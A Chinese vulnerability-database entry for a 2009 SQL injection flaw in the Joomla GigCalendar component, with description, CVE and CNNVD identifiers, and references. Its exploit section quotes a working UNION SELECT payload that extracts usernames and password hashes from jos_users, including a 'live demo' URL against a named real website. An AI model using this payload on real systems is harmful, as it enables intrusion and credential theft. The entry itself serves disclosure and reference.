Gigcalendar SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117260 漏洞类型 SQL注入
发布时间 2009-01-18 更新时间 2009-06-23
CVE编号 CVE-2009-0730 CNNVD-ID CNNVD-200902-687
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7815
https://cxsecurity.com/issue/WLB-2009020274
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-687
|漏洞详情
gigCalendar是一个免费的为维护网站旅游日志的的Joomla!andMambo组件。Mambo和Joomla!GigCalendar(com_gigcal)组件中存在多个SQL注入漏洞,当magic_quotes_gpc被中止时,远程攻击者(1)可以借助对index.php的一个细节操作的gigcal_venues_id参数,且该参数没有经过venuedetails.php适当地处理,以执行任意SQL指令;(2)借助对index.php的一个细节操作中igcal_bands_id参数,且该参数没有经过banddetails.php适当地处理,以执行任意SQL命令。
|漏洞EXP
*****************************************************************************
* 					 	                            *
*           Joomla Component Gigcal SQL Injection Vulnerability             *
*                           						    *
*****************************************************************************

***************************************
[=] Vulnerability found by: Lanti-Net
[=] Contact: lanti-net[at]hotmail[dot]com
[=] Site: www.khg-crew.ws
[=] Greetz: boom3rang, KHG, urtan, H!tm@N , war_ning, chs, redc00de , SpYrO
[=]         -=[Kosova Hackers Group]=--=[KHG-Crew]=-
***************************************
[=] Exploit  : /index.php?option=com_gigcal&Itemid=78&id={SQL}
[=] Example  : /index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
[=] Live Demo: http://www.fermaten.dk/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
***************************************
[=] Proud 2 be Albanian
[=] Proud 2 be Muslim
[=] United States of Albania
***************************************

# milw0rm.com [2009-01-18]
|参考资料

来源:XF
名称:gigcalendar-venuedetails-sql-injection(48865)
链接:http://xforce.iss.net/xforce/xfdb/48865
来源:BID
名称:33863
链接:http://www.securityfocus.com/bid/33863
来源:BID
名称:33859
链接:http://www.securityfocus.com/bid/33859
来源:BUGTRAQ
名称:20090221gigCalendar1.0(banddetails.php)JoomlaComponentSQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/501176/100/0/threaded
来源:BUGTRAQ
名称:20090221gigCalendar1.0(venuedetails.php)JoomlaComponentSQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/501175/100/0/threaded
来源:BUGTRAQ
名称:20090221gigCalendarJoomlaComponent1.0SQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/501174/100/0/threaded